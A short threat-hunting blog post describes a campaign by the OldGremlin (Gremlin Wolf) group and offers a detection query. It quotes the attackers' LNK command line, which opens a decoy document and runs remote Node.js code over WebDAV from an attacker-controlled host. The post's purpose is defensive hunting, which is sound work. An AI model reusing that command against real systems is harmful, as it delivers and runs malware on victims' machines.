105. Hunting for Gremlin Wolf (OldGremlin)

Hello everyone! Let's look at another activity cluster - Gremlin Wolf (also known as OldGremlin). This is one of my favorite adversaries, and recently I spotted another campaign, so I decided to share some detection and hunting opportunities.

The adversary distributes malicious LNK files, for example, this one. It's used to get and open a decoy document from a remote server, as well as to get a NodeJS interpreter to run a malicious JS-script:

cmd.exe /c start /B \\documents-drive.com\DavWWWRoot\DIADOC_Akt_sverki-04.25.docx & start /B \\documents-drive.com\DavWWWRoot\node.exe \\documents-drive.com\DavWWWRoot\index.txt

To hunt for such activity, I would focus on WebDAV and NodeJS interpreter, so the hunting query may look like this:

event_type: "processcreatewin"

AND

proc_file_name: "cmd.exe"

AND

cmdline: ("DavWWWRoot" AND "node.exe")

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge